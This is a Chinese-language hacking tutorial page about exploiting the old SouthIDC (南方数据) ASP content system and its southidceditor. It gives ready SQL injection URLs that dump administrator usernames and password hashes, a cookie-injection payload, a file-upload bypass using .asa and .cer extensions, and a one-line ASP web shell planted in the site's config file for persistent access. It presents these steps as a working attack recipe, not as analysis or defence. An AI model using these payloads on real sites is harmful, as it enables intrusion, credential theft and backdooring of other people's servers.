南方数据编辑器

# 南方数据编辑器southidceditor注入漏洞

漏洞影响版本较老

1.[注入](/static/baige/02-编辑器漏洞/南方数据southidceditor/http://www.webshell.cc/tag/zhuru)点:`news_search.asp?key=7%’ union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9 from admin where 1 or ‘%’=’&otype=title&Submit=%CB%D1%CB%F7`
直接暴管理员帐号密码(md5)

2.登陆后台

3.利用编辑器[上传](/static/baige/02-编辑器漏洞/南方数据southidceditor/http://www.webshell.cc/tag/shangchuan):

访问admin/southidceditor/admin_style.asp

修改编辑器样式,增加asa(不要asp).然后直接后台编辑新闻上传.

========================================

参考资料整理:

1、通过upfile_other.asp漏洞文件直接取SHELL

直接打开userreg.asp进行注册会员,进行登录,(在未退出登录的状态下)使用本地上传文件进行上传代码如下:

“`


“`

将以上代码保存为html格式,替换代码中的网址,第一个框里选择图片文件,第二个框选择.cer、.asa或asp文件上传(后面需要加一个空格,貌似在IE8中进行使用不能后面加空格,加空格时就弹出选择文件对话框,我是找不到解决办法)。

注:此方法通杀南方数据、良精系统、网软天下等

2、通过注入秒杀管理员帐号密码,使用如下:

`http://******/NewsType.asp?SmallClass=’%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20’’=’`

以上代码直接暴管理员帐号和密码,取SHELL方法如下:

在网站配置[http://\*****\*/admin/SiteConfig.asp]的版权信息里写入`”%><%eval(request(chr(35)))%><%’` 成功把shell写入http://\*****\*/inc/config.asp 这里一句话chr(32)密码是“#” 3、cookie注入 清空地址栏,利用union语句来注入,提交: `javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from Admin"))`

© 版权声明
THE END
喜欢就支持一下吧
点赞0赞赏 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容